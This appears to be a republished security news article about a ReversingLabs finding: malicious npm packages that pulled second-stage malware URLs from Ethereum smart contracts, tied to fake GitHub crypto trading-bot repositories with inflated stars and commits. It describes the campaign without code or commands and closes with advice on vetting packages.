A new malicious campaign has been uncovered targeting developers through npm packages and GitHub repositories, leveraging an unusual tactic: hiding command-and-control (C2) infrastructure inside Ethereum smart contracts.

The operation was first detected in early July, when ReversingLabs researcher Karlo Zanki identified a suspicious package called “colortoolsv2” published on npm. Although the package was quickly removed, attackers tried to continue the campaign by uploading a near-identical clone named “mimelib2.” Both packages used blockchain mechanisms to deliver a second-stage malware payload.

A Novel Evasion Technique

While malicious npm downloaders are not new, they typically embed malicious URLs or scripts directly in the package code. In this case, however, the attackers used Ethereum smart contracts to host and distribute the URLs for retrieving the malware.

This method makes detection significantly harder, since the malicious infrastructure is hidden within blockchain code rather than inside the package files.

“Downloaders appear weekly, but this use of smart contracts to load malicious commands is something we haven’t seen before,” ReversingLabs researchers explained.
“It demonstrates how quickly adversaries are adapting their evasion strategies while exploiting open-source repositories and developers.”

Fake GitHub Repositories Masquerading as Crypto Tools

The investigation also revealed that the npm packages were tied to a larger GitHub campaign. Threat actors created fake repositories disguised as cryptocurrency trading bots, which appeared legitimate with thousands of commits, multiple maintainers, and active watchers.

However, much of this activity was fabricated:

• Stars and watchers came from accounts created only in July with almost no history.
• Puppet accounts posed as maintainers to boost credibility.
• Commits and forks were artificially inflated to give the illusion of popularity.

One prominent example was a repository named “solana-trading-bot-v2,” which bundled the malicious npm package. Despite appearing like a genuine project, closer inspection exposed the fake activity designed to trick developers.

Expanding Threat Landscape for Open Source

This discovery adds to the growing number of software supply chain attacks targeting crypto-related development projects.

ReversingLabs’s 2025 Software Supply Chain Security report noted 23 similar campaigns in 2024, including the compromise of the PyPI package ultralytics in December, which was manipulated to deliver a coin miner.

These incidents highlight the increasing sophistication of attackers, who now combine open-source manipulation with blockchain-based evasion techniques.

ReversingLabs researchers emphasize that developers must:

• Rigorously vet libraries, packages, and maintainers
• Avoid relying solely on surface-level metrics such as stars, commits, or downloads
• Adopt stronger package assessment tools to safeguard projects and digital assets

The report concludes that only increased vigilance and proactive defenses can mitigate the risks of evolving supply chain threats.

Source: https://www.infosecurity-magazine.com/news/malicious-npm-packages-exploit